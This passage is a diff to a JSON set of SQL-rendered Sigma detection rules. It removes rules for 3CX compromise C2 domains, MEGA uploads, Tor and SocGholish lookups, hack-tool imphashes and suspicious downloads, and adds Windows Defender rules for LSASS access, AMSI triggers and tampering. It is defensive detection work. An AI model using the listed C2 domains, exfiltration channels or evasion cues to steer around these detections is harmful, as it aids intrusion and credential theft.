"experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PSExec and WMI Process Creations Block", + "id": "97b9ce1e-c5ab-11ea-87d0-0242ac130003", + "status": "test", + "description": "Detects blocking of process creations originating from PSExec and WMI commands", + "author": "Bhabesh Raj", "tags": [ - "attack.command_and_control" + "attack.execution", + "attack.lateral_movement", + "attack.t1047", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (QueryName LIKE '%akamaicontainer.com%' ESCAPE '\\' OR QueryName LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR QueryName LIKE '%azuredeploystore.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR QueryName LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR QueryName LIKE '%dunamistrd.com%' ESCAPE '\\' OR QueryName LIKE '%glcloudservice.com%' ESCAPE '\\' OR QueryName LIKE '%journalide.org%' ESCAPE '\\' OR QueryName LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR QueryName LIKE '%msedgeupdate.net%' ESCAPE '\\' OR QueryName LIKE '%msstorageazure.com%' ESCAPE '\\' OR QueryName LIKE '%msstorageboxes.com%' ESCAPE '\\' OR QueryName LIKE '%officeaddons.com%' ESCAPE '\\' OR QueryName LIKE '%officestoragebox.com%' ESCAPE '\\' OR QueryName LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR QueryName LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR QueryName LIKE '%pbxsources.com%' ESCAPE '\\' OR QueryName LIKE '%qwepoi123098.com%' ESCAPE '\\' OR QueryName LIKE '%sbmsa.wiki%' ESCAPE '\\' OR QueryName LIKE '%sourceslabs.com%' ESCAPE '\\' OR QueryName LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR QueryName LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND 
EventID = '1121' AND (ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\psexesvc.exe' ESCAPE '\\'))" ], - "filename": "dns_query_win_malware_3cx_compromise.yml" + "filename": "win_defender_psexec_wmi_asr.yml" }, { - "title": "DNS Query for MEGA.io Upload Domain - Sysmon", - "id": "613c03ba-0779-4a53-8a1f-47f914a4ded3", - "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Aaron Greetham (@beardofbinary) - NCC Group", + "title": "LSASS Access Detected via Attack Surface Reduction", + "id": "a0a278fe-2c0e-4de2-ac3c-c68b08a9ba98", + "status": "experimental", + "description": "Detects Access to LSASS Process", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Google Chrome GoogleUpdate.exe", + "Some Taskmgr.exe related activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND (EventID = '1121' AND Path LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\atiesrxx.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\CompatTelRunner.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\nvwmi64.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat 
Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', 
'4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 
'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash 
LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron 
Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an 
Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - 
"description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '15' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' 
ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time 